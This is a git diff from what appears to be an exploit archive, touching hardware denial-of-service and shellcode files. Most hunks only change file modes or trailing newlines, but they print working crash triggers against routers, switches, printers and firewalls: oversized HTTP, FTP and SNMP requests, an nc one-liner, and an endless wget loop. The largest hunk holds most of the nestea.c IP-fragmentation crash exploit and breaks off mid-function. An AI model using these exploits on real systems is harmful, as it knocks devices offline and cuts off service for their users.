--git a/platforms/generator/shellcode/13528.c b/platforms/generator/shellcode/13528.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/14261.c b/platforms/generator/shellcode/14261.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/16025.c b/platforms/generator/shellcode/16025.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/17996.c b/platforms/generator/shellcode/17996.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/36411.txt b/platforms/generator/shellcode/36411.txt old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/36781.py b/platforms/generator/shellcode/36781.py index 3dc58cb76..39439f92c 100755 --- a/platforms/generator/shellcode/36781.py +++ b/platforms/generator/shellcode/36781.py @@ -265,4 +265,4 @@ $ ./shellcode Shellcode Length: 136 $whoami root -$ \ No newline at end of file +$ \ No newline at end of file diff --git a/platforms/generator/shellcode/38094.c b/platforms/generator/shellcode/38094.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/39815.c b/platforms/generator/shellcode/39815.c old mode 100755 new mode 100644 diff --git a/platforms/generator/shellcode/41220.c b/platforms/generator/shellcode/41220.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/10237.txt b/platforms/hardware/dos/10237.txt old mode 100755 new mode 100644 index 80a26b060..98a9fc78e --- a/platforms/hardware/dos/10237.txt +++ b/platforms/hardware/dos/10237.txt @@ -14,4 +14,4 @@ $ ping $ip_address # works the one-liner: $ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80 -$ ping $ip_address # doesn't work \ No newline at end of file +$ ping $ip_address # doesn't work \ No newline at end of file diff --git a/platforms/hardware/dos/10352.txt b/platforms/hardware/dos/10352.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/10947.txt b/platforms/hardware/dos/10947.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/11043.txt b/platforms/hardware/dos/11043.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/11291.txt b/platforms/hardware/dos/11291.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/11427.txt b/platforms/hardware/dos/11427.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/11880.txt b/platforms/hardware/dos/11880.txt old mode 100755 new mode 100644 index a54c6b1d2..006e317c6 --- a/platforms/hardware/dos/11880.txt +++ b/platforms/hardware/dos/11880.txt @@ -106,5 +106,4 @@ close $sock; ##################################################################################### -(PRL-2010-01) - \ No newline at end of file +(PRL-2010-01) \ No newline at end of file diff --git a/platforms/hardware/dos/12093.txt b/platforms/hardware/dos/12093.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/12252.txt b/platforms/hardware/dos/12252.txt old mode 100755 new mode 100644 index 810c57c5b..ef1e3d631 --- a/platforms/hardware/dos/12252.txt +++ b/platforms/hardware/dos/12252.txt @@ -115,4 +115,4 @@ posted regularly on our website. Contact: research [at] dsecrg [dot] com -http://www.dsecrg.com \ No newline at end of file +http://www.dsecrg.com \ No newline at end of file diff --git a/platforms/hardware/dos/12297.txt b/platforms/hardware/dos/12297.txt old mode 100755 new mode 100644 index 41930ad6c..98c703749 --- a/platforms/hardware/dos/12297.txt +++ b/platforms/hardware/dos/12297.txt @@ -50,4 +50,4 @@ House, Aldo, Chewi, Alex, Paco. hkm@hakim.ws - [ Comunidad Underground de Mexico - http://www.underground.org.mx ] \ No newline at end of file + [ Comunidad Underground de Mexico - http://www.underground.org.mx ] \ No newline at end of file diff --git a/platforms/hardware/dos/12344.txt b/platforms/hardware/dos/12344.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/1274.c b/platforms/hardware/dos/1274.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/13823.txt b/platforms/hardware/dos/13823.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/13824.txt b/platforms/hardware/dos/13824.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/13825.txt b/platforms/hardware/dos/13825.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/1447.c b/platforms/hardware/dos/1447.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/1464.c b/platforms/hardware/dos/1464.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/1473.c b/platforms/hardware/dos/1473.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/1496.c b/platforms/hardware/dos/1496.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/15380.txt b/platforms/hardware/dos/15380.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/15504.txt b/platforms/hardware/dos/15504.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/15508.txt b/platforms/hardware/dos/15508.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/1551.txt b/platforms/hardware/dos/1551.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/15792.php b/platforms/hardware/dos/15792.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/15794.php b/platforms/hardware/dos/15794.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/15796.php b/platforms/hardware/dos/15796.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/15805.php b/platforms/hardware/dos/15805.php old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/18688.txt b/platforms/hardware/dos/18688.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/18705.txt b/platforms/hardware/dos/18705.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/18734.txt b/platforms/hardware/dos/18734.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/18751.txt b/platforms/hardware/dos/18751.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/19064.txt b/platforms/hardware/dos/19064.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/19436.txt b/platforms/hardware/dos/19436.txt old mode 100755 new mode 100644 index 2fe79c596..9854f23fb --- a/platforms/hardware/dos/19436.txt +++ b/platforms/hardware/dos/19436.txt @@ -14,4 +14,4 @@ nmap is a very powerful port scanner. With this command it does only a PING and To verify that your connections table is quickly growing, try "fw tab -t connections -s" at 10 second intervals. -Tested on ver 4.0 SP3 on Solaris x86 2.6. \ No newline at end of file +Tested on ver 4.0 SP3 on Solaris x86 2.6. \ No newline at end of file diff --git a/platforms/hardware/dos/19441.c b/platforms/hardware/dos/19441.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/19477.txt b/platforms/hardware/dos/19477.txt old mode 100755 new mode 100644 index 47416f31f..41c489f1f --- a/platforms/hardware/dos/19477.txt +++ b/platforms/hardware/dos/19477.txt @@ -10,4 +10,4 @@ RCPT TO: invalid@target.com DATA . -QUIT \ No newline at end of file +QUIT \ No newline at end of file diff --git a/platforms/hardware/dos/19513.txt b/platforms/hardware/dos/19513.txt old mode 100755 new mode 100644 index caf8fdac6..3a2972c7c --- a/platforms/hardware/dos/19513.txt +++ b/platforms/hardware/dos/19513.txt @@ -4,4 +4,4 @@ A vulnerability in the Diva LAN ISDN Modem allows remote malicious users to lock The vulnerability manifests itself when a remote users connects to the Diva HTTP port and sends a GET request of the form 'login.html?password=<very long string>'. -Enter the URL 'http://diva/login.htm?password=0123456789012345678901234567890123456789' into your browser, where 'diva' is the IP address of the modem. \ No newline at end of file +Enter the URL 'http://diva/login.htm?password=0123456789012345678901234567890123456789' into your browser, where 'diva' is the IP address of the modem. \ No newline at end of file diff --git a/platforms/hardware/dos/19531.txt b/platforms/hardware/dos/19531.txt old mode 100755 new mode 100644 index 69f9c9b32..7bd57a40b --- a/platforms/hardware/dos/19531.txt +++ b/platforms/hardware/dos/19531.txt @@ -9,4 +9,4 @@ Vulnerable IOS software may be found on the following Cisco devices: -Catalyst 2900XL LAN switch. -Cisco DitributedDirector. -nmap -sU -p514 <IP-of-Cisco-device> \ No newline at end of file +nmap -sU -p514 <IP-of-Cisco-device> \ No newline at end of file diff --git a/platforms/hardware/dos/19766.txt b/platforms/hardware/dos/19766.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/19919.c b/platforms/hardware/dos/19919.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/19923.txt b/platforms/hardware/dos/19923.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/20050.c b/platforms/hardware/dos/20050.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/20090.txt b/platforms/hardware/dos/20090.txt old mode 100755 new mode 100644 index 451b3cc64..d5fc04d0a --- a/platforms/hardware/dos/20090.txt +++ b/platforms/hardware/dos/20090.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/1491/info HP JetDirect firmware is vulnerable to a Denial of Service attack. JetDirect devices have an FTP service which fails to properly handle bad FTP commands sent with the ftp "quote" command. This causes the device to stop responding and possibly display an error message. Powering the device off and on is required to regain normal functionality. ftp <printer address> -quote AAAAAAAAAAA \ No newline at end of file +quote AAAAAAAAAAA \ No newline at end of file diff --git a/platforms/hardware/dos/20323.txt b/platforms/hardware/dos/20323.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/20328.txt b/platforms/hardware/dos/20328.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/20331.c b/platforms/hardware/dos/20331.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/20487.pl b/platforms/hardware/dos/20487.pl index f92b4b229..97c9361bc 100755 --- a/platforms/hardware/dos/20487.pl +++ b/platforms/hardware/dos/20487.pl @@ -41,4 +41,4 @@ $counter += 1; } print "\nDone.\n\n"; -close($socket); \ No newline at end of file +close($socket); \ No newline at end of file diff --git a/platforms/hardware/dos/2059.cpp b/platforms/hardware/dos/2059.cpp old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/20644.c b/platforms/hardware/dos/20644.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/20734.sh b/platforms/hardware/dos/20734.sh index 645519dc1..cb0c3f7b3 100755 --- a/platforms/hardware/dos/20734.sh +++ b/platforms/hardware/dos/20734.sh @@ -11,4 +11,4 @@ pixfirewall# aaa authentication Any configurations not including aaa authentication are not affected. -while (true); do (wget http://external.system 2>/dev/null &); done \ No newline at end of file +while (true); do (wget http://external.system 2>/dev/null &); done \ No newline at end of file diff --git a/platforms/hardware/dos/20821.txt b/platforms/hardware/dos/20821.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/20824.txt b/platforms/hardware/dos/20824.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/20847.c b/platforms/hardware/dos/20847.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21092.txt b/platforms/hardware/dos/21092.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21103.c b/platforms/hardware/dos/21103.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21296.c b/platforms/hardware/dos/21296.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21465.txt b/platforms/hardware/dos/21465.txt old mode 100755 new mode 100644 index f9c296f6d..6f5010c85 --- a/platforms/hardware/dos/21465.txt +++ b/platforms/hardware/dos/21465.txt @@ -23,4 +23,4 @@ linuxbox# make libpackets.a linuxbox# gcc -o icmp_redflod -I. -L. icmp_redflod.c -lpackets linuxbox# ./icmp_redflod -i eth0 -D <destination_ip> -G <fake_gateway> -On high bandwidth networks, the command line switch -w0 can be used to increase the sending rate. \ No newline at end of file +On high bandwidth networks, the command line switch -w0 can be used to increase the sending rate. \ No newline at end of file diff --git a/platforms/hardware/dos/21523.txt b/platforms/hardware/dos/21523.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/2156.c b/platforms/hardware/dos/2156.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21561.txt b/platforms/hardware/dos/21561.txt old mode 100755 new mode 100644 index ef7c519d0..3c483d2a7 --- a/platforms/hardware/dos/21561.txt +++ b/platforms/hardware/dos/21561.txt @@ -35,4 +35,4 @@ SYN=1 !Sleep 1000 -!Display=$done \ No newline at end of file +!Display=$done \ No newline at end of file diff --git a/platforms/hardware/dos/21637.c b/platforms/hardware/dos/21637.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21655.c b/platforms/hardware/dos/21655.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21656.txt b/platforms/hardware/dos/21656.txt old mode 100755 new mode 100644 index 22a6dee87..02df2a58a --- a/platforms/hardware/dos/21656.txt +++ b/platforms/hardware/dos/21656.txt @@ -4,4 +4,4 @@ The Lucent Access Point series of routers support a web based administrative int It has been reported that sending a HTTP request consisting of approximately 4000 characters of data will cause the device to reboot. This may result in an interruption of service for legitimate users of the device. -wget `perl -e 'print "http://router_ip/"; print "A"x4000; print "/";` \ No newline at end of file +wget `perl -e 'print "http://router_ip/"; print "A"x4000; print "/";` \ No newline at end of file diff --git a/platforms/hardware/dos/21657.txt b/platforms/hardware/dos/21657.txt old mode 100755 new mode 100644 index 3acbe958d..4ceb6066d --- a/platforms/hardware/dos/21657.txt +++ b/platforms/hardware/dos/21657.txt @@ -4,4 +4,4 @@ An issue has been reported with the HP ProCurve 4000M Switch. An attacker with SNMP write access to the device may write to the SNMP variable .iso.3.6.1.4.1.11.2.36.1.1.2.1.0. If more than 85 characters are written to this variable, the device will crash the next time it accepts a connection to either the configured telnet or HTTP port. -snmpwrite <switch_ip> private .iso.3.6.1.4.1.11.2.36.1.1.2.1.0 s `perl -e 'print "A"x85;'` \ No newline at end of file +snmpwrite <switch_ip> private .iso.3.6.1.4.1.11.2.36.1.1.2.1.0 s `perl -e 'print "A"x85;'` \ No newline at end of file diff --git a/platforms/hardware/dos/21736.txt b/platforms/hardware/dos/21736.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21756.txt b/platforms/hardware/dos/21756.txt old mode 100755 new mode 100644 index c20931175..1cd26e2bc --- a/platforms/hardware/dos/21756.txt +++ b/platforms/hardware/dos/21756.txt @@ -6,4 +6,4 @@ Reportedly, this issue may be exploited by making a sequence of SNMP requests. A Under some conditions, the device may also fail to respond on the ethernet interface. -snmpwalk <ip address> <arbitrary objectID> \ No newline at end of file +snmpwalk <ip address> <arbitrary objectID> \ No newline at end of file diff --git a/platforms/hardware/dos/2176.html b/platforms/hardware/dos/2176.html old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21770.c b/platforms/hardware/dos/21770.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21791.txt b/platforms/hardware/dos/21791.txt old mode 100755 new mode 100644 index 9b63a6129..c2adcfd86 --- a/platforms/hardware/dos/21791.txt +++ b/platforms/hardware/dos/21791.txt @@ -4,4 +4,4 @@ The SSR8000 is a SmartSwitch distributed and maintained by Enterasys. It has been discovered that SSR8000 switches react unpredictably when portscanned. When these switches are scanned using specific types of TCP traffic, and scanned on certain ports, the switch becomes unstable. It has been reported that this can be reproduced consistently to cause the switch to crash. -nmap -PT 10.2.1.1 -p '15077-15078' \ No newline at end of file +nmap -PT 10.2.1.1 -p '15077-15078' \ No newline at end of file diff --git a/platforms/hardware/dos/21828.txt b/platforms/hardware/dos/21828.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/21939.txt b/platforms/hardware/dos/21939.txt old mode 100755 new mode 100644 index dd82e0205..e4455a335 --- a/platforms/hardware/dos/21939.txt +++ b/platforms/hardware/dos/21939.txt @@ -6,4 +6,4 @@ The device may need to be restarted to regain normal functionality. perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 & -Issue the above command four or more times to cause the denial of service condition. \ No newline at end of file +Issue the above command four or more times to cause the denial of service condition. \ No newline at end of file diff --git a/platforms/hardware/dos/21971.txt b/platforms/hardware/dos/21971.txt old mode 100755 new mode 100644 index 64b45e6b9..0690c7a80 --- a/platforms/hardware/dos/21971.txt +++ b/platforms/hardware/dos/21971.txt @@ -6,4 +6,4 @@ This issue was reported for Cisco AS5350 devices running Cisco IOS release 12.2( There are conflicting reports regarding the existence of this vulnerability. One source states that this condition reportedly does not occur if there are no Access Control Lists (ACL) applied on the device and also mentions that this may be related to a known SSH bug. Other sources have indicated that the issue may be related to a configuration problem. -nmap -Tinsane -p 1-65535 <target> \ No newline at end of file +nmap -Tinsane -p 1-65535 <target> \ No newline at end of file diff --git a/platforms/hardware/dos/21975.txt b/platforms/hardware/dos/21975.txt old mode 100755 new mode 100644 index 423811779..1dcf8b809 --- a/platforms/hardware/dos/21975.txt +++ b/platforms/hardware/dos/21975.txt @@ -4,4 +4,4 @@ Linksys BEFSR41 is vulnerable to a denial of service condition. The denial of service condition will be triggered when the device receives a request for the script file 'Gozila.cgi' without any parameters. -http://192.168.1.1/Gozila.cgi? \ No newline at end of file +http://192.168.1.1/Gozila.cgi? \ No newline at end of file diff --git a/platforms/hardware/dos/21978.txt b/platforms/hardware/dos/21978.txt old mode 100755 new mode 100644 index 7d143eceb..eacc85747 --- a/platforms/hardware/dos/21978.txt +++ b/platforms/hardware/dos/21978.txt @@ -9,4 +9,4 @@ Rebooting the device is necessary to restore functionality. Although not yet confirmed, it has been speculated that this issue is a result of a buffer overflow. GET / HTTP/1.1 -Host: <lots of characters> \ No newline at end of file +Host: <lots of characters> \ No newline at end of file diff --git a/platforms/hardware/dos/22060.txt b/platforms/hardware/dos/22060.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22407.txt b/platforms/hardware/dos/22407.txt old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22415.c b/platforms/hardware/dos/22415.c old mode 100755 new mode 100644 diff --git a/platforms/hardware/dos/22440.c b/platforms/hardware/dos/22440.c old mode 100755 new mode 100644 index 643e3b12b..633a975b0 --- a/platforms/hardware/dos/22440.c +++ b/platforms/hardware/dos/22440.c @@ -1,275 +1,279 @@ +/* source: http://www.securityfocus.com/bid/7219/info It has been reported that the implementation of the Internet Protocol (IP) in the firmware of the D-Link DI-614+ wireless router is vulnerable to a remotely exploitable denial of service condition. The vulnerability is related to the reassembly of fragmented IP packets and can be triggered by transmission of fragments with malicious size parameters to an affected device. There is existing source code that exploits similar, older vulnerabilities that can be used to successfully exploit this vulnerability. When exploited, the device will reboot instantly. This will result in a denial of service until the device has restarted. +*/ - // nestea.c by humble of rhino9 4/16/98 - // This exploits the "off by one ip header" bug in the linux ip frag code. - // Crashes linux 2.0.* and 2.1.* and some windows boxes - // this code is a total rip of teardrop - it's messy - // hi sygma +// nestea.c by humble of rhino9 4/16/98 +// This exploits the "off by one ip header" bug in the linux ip frag code. +// Crashes linux 2.0.* and 2.1.* and some windows boxes +// this code is a total rip of teardrop - it's messy +// hi sygma - #include <stdio.h> - #include <stdlib.h> - #include <unistd.h> - #include <string.h> - #include <netdb.h> - #include <netinet/in.h> - #include <netinet/udp.h> - #include <arpa/inet.h> - #include <sys/types.h> - #include <sys/time.h> - #include <sys/socket.h> +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> +#include <string.h> +#include <netdb.h> +#include <netinet/in.h> +#include <netinet/udp.h> +#include <arpa/inet.h> +#include <sys/types.h> +#include <sys/time.h> +#include <sys/socket.h> - // bsd usage is currently broken because of socket options on the third sendto +// bsd usage is currently broken because of socket options on the third sendto - #ifdef STRANGE_BSD_BYTE_ORDERING_THING - /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ - #define FIX(n) (n) - #else /* OpenBSD 2.1, all Linux */ - #define FIX(n) htons(n) - #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ +#ifdef STRANGE_BSD_BYTE_ORDERING_THING +/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ +#define FIX(n) (n) +#else /* OpenBSD 2.1, all Linux */ +#define FIX(n) htons(n) +#endif /* STRANGE_BSD_BYTE_ORDERING_THING */ - #define IP_MF 0x2000 /* More IP fragment en route */ - #define IPH 0x14 /* IP header size */ - #define UDPH 0x8 /* UDP header size */ - #define MAGIC2 108 - #define PADDING 256 /* datagram frame padding for first packet */ - #define COUNT 500 /* we are overwriting a small number of bytes we - shouldnt have access to in the kernel. - to be safe, we should hit them till they die :> */ +#define IP_MF 0x2000 /* More IP fragment en route */ +#define IPH 0x14 /* IP header size */ +#define UDPH 0x8 /* UDP header size */ +#define MAGIC2 108 +#define PADDING 256 /* datagram frame padding for first packet */ +#define COUNT 500 /* we are overwriting a small number of bytes we +shouldnt have access to in the kernel. +to be safe, we should hit them till they die :> */ - void usage(u_char *); - u_long name_resolve(u_char *); - u_short in_cksum(u_short *, int); - void send_frags(int, u_long, u_long, u_short, u_short); +void usage(u_char *); +u_long name_resolve(u_char *); +u_short in_cksum(u_short *, int); +void send_frags(int, u_long, u_long, u_short, u_short); - int main(int argc, char **argv) - { - int one = 1, count = 0, i, rip_sock; - u_long src_ip = 0, dst_ip = 0; - u_short src_prt = 0, dst_prt = 0; - struct in_addr addr; +int main(int argc, char **argv) +{ +int one = 1, count = 0, i, rip_sock; +u_long src_ip = 0, dst_ip = 0; +u_short src_prt = 0, dst_prt = 0; +struct in_addr addr; - if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) - { - perror("raw socket"); - exit(1); - } - if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) - < 0) - { - perror("IP_HDRINCL"); - exit(1); - } - if (argc < 3) usage(argv[0]); - if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) - { - fprintf(stderr, "What the hell kind of IP address is that?\n"); - exit(1); - } +if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) +{ +perror("raw socket"); +exit(1); +} +if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) +< 0) +{ +perror("IP_HDRINCL"); +exit(1); +} +if (argc < 3) usage(argv[0]); +if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) +{ +fprintf(stderr, "What the hell kind of IP address is that?\n"); +exit(1); +} - while ((i = getopt(argc, argv, "s:t:n:")) != EOF) - { - switch (i) - { - case 's': /* source port (should be emphemeral) */ - src_prt = (u_short)atoi(optarg); - break; - case 't': /* dest port (DNS, anyone?) */ - dst_prt = (u_short)atoi(optarg); - break; - case 'n': /* number to send */ - count = atoi(optarg); - break; - default : - usage(argv[0]); - break; /* NOTREACHED */ - } - } - srandom((unsigned)(time((time_t)0))); - if (!src_prt) src_prt = (random() % 0xffff); - if (!dst_prt) dst_prt = (random() % 0xffff); - if (!count) count = COUNT; +while ((i = getopt(argc, argv, "s:t:n:")) != EOF) +{ +switch (i) +{ +case 's': /* source port (should be emphemeral) */ +src_prt = (u_short)atoi(optarg); +break; +case 't': /* dest port (DNS, anyone?) */ +dst_prt = (u_short)atoi(optarg); +break; +case 'n': /* number to send */ +count = atoi(optarg); +break; +default : +usage(argv[0]); +break; /* NOTREACHED */ +} +} +srandom((unsigned)(time((time_t)0))); +if (!src_prt) src_prt = (random() % 0xffff); +if (!dst_prt) dst_prt = (random() % 0xffff); +if (!count) count = COUNT; - fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n"); - fprintf(stderr, "Death on flaxen wings (yet again):\n"); - addr.s_addr = src_ip; - fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); - addr.s_addr = dst_ip; - fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); - fprintf(stderr, " Amt: %5d\n", count); - fprintf(stderr, "[ "); +fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n"); +fprintf(stderr, "Death on flaxen wings (yet again):\n"); +addr.s_addr = src_ip; +fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); +addr.s_addr = dst_ip; +fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); +fprintf(stderr, " Amt: %5d\n", count); +fprintf(stderr, "[ "); - for (i = 0; i < count; i++) - { - send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); - fprintf(stderr, "b00m "); - usleep(500); - } - fprintf(stderr, "]\n"); - return (0); - } +for (i = 0; i < count; i++) +{ +send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); +fprintf(stderr, "b00m "); +usleep(500); +} +fprintf(stderr, "]\n"); +return (0); +} - void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, - u_short dst_prt) - { - int i; - u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ - u_char byte; /* a byte */ - struct sockaddr_in sin; /* socket protocol structure */ +void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, +u_short dst_prt) +{ +int i; +u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ +u_char byte; /* a byte */ +struct sockaddr_in sin; /* socket protocol structure */ - sin.sin_family = AF_INET; - sin.sin_port = src_prt; - sin.sin_addr.s_addr = dst_ip; +sin.sin_family = AF_INET; +sin.sin_port = src_prt; +sin.sin_addr.s_addr = dst_ip; - packet = (u_char *)malloc(IPH + UDPH + PADDING+40); - p_ptr = packet; - bzero((u_char *)p_ptr, IPH + UDPH + PADDING); +packet = (u_char *)malloc(IPH + UDPH + PADDING+40); +p_ptr = packet; +bzero((u_char *)p_ptr, IPH + UDPH + PADDING); - byte = 0x45; /* IP version and header length */ - memcpy(p_ptr, &byte, sizeof(u_char)); - p_ptr += 2; /* IP TOS (skipped) */ - *((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */ - p_ptr += 2; - *((u_short *)p_ptr) = htons(242); /* IP id */ - p_ptr += 2; - *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ - p_ptr += 2; - *((u_short *)p_ptr) = 0x40; /* IP TTL */ - byte = IPPROTO_UDP; - memcpy(p_ptr + 1, &byte, sizeof(u_char)); - p_ptr += 4; /* IP checksum filled in by kernel */ - *((u_long *)p_ptr) = src_ip; /* IP source address */ - p_ptr += 4; - *((u_long *)p_ptr) = dst_ip; /* IP destination address */ - p_ptr += 4; - *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ - p_ptr += 2; - *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ - p_ptr += 2; - *((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */ +byte = 0x45; /* IP version and header length */ +memcpy(p_ptr, &byte, sizeof(u_char)); +p_ptr += 2; /* IP TOS (skipped) */ +*((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */ +p_ptr += 2; +*((u_short *)p_ptr) = htons(242); /* IP id */ +p_ptr += 2; +*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ +p_ptr += 2; +*((u_short *)p_ptr) = 0x40; /* IP TTL */ +byte = IPPROTO_UDP; +memcpy(p_ptr + 1, &byte, sizeof(u_char)); +p_ptr += 4; /* IP checksum filled in by kernel */ +*((u_long *)p_ptr) = src_ip; /* IP source address */ +p_ptr += 4; +*((u_long *)p_ptr) = dst_ip; /* IP destination address */ +p_ptr += 4; +*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ +p_ptr += 2; +*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ +p_ptr += 2; +*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */ - if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin, - sizeof(struct sockaddr)) == -1) - { - perror("\nsendto"); - free(packet); - exit(1); - } +if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin, +sizeof(struct sockaddr)) == -1) +{ +perror("\nsendto"); +free(packet); +exit(1); +} - p_ptr = packet; - bzero((u_char *)p_ptr, IPH + UDPH + PADDING); +p_ptr = packet; +bzero((u_char *)p_ptr, IPH + UDPH + PADDING); - byte = 0x45; /* IP version and header length */ - memcpy(p_ptr, &byte, sizeof(u_char)); - p_ptr += 2; /* IP TOS (skipped) */ - *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */ - p_ptr += 2; - *((u_short *)p_ptr) = htons(242); /* IP id */ - p_ptr += 2; - *((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */ - p_ptr += 2; - *((u_short *)p_ptr) = 0x40; /* IP TTL */ - byte = IPPROTO_UDP; - memcpy(p_ptr + 1, &byte, sizeof(u_char)); - p_ptr += 4; /* IP checksum filled in by kernel */ - *((u_long *)p_ptr) = src_ip; /* IP source address */ - p_ptr += 4; - *((u_long *)p_ptr) = dst_ip; /* IP destination address */ - p_ptr += 4; - *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ - p_ptr += 2; - *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ - p_ptr += 2; - *((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */ +byte = 0x45; /* IP version and header length */ +memcpy(p_ptr, &byte, sizeof(u_char)); +p_ptr += 2; /* IP TOS (skipped) */ +*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */ +p_ptr += 2; +*((u_short *)p_ptr) = htons(242); /* IP id */ +p_ptr += 2; +*((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */ +p_ptr += 2; +*((u_short *)p_ptr) = 0x40; /* IP TTL */ +byte = IPPROTO_UDP; +memcpy(p_ptr + 1, &byte, sizeof(u_char)); +p_ptr += 4; /* IP checksum filled in by kernel */ +*((u_long *)p_ptr) = src_ip; /* IP source address */ +p_ptr += 4; +*((u_long *)p_ptr) = dst_ip; /* IP destination address */ +p_ptr += 4; +*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ +p_ptr += 2; +*((u_short *)p_ptr) = htons(dst_prt); /* 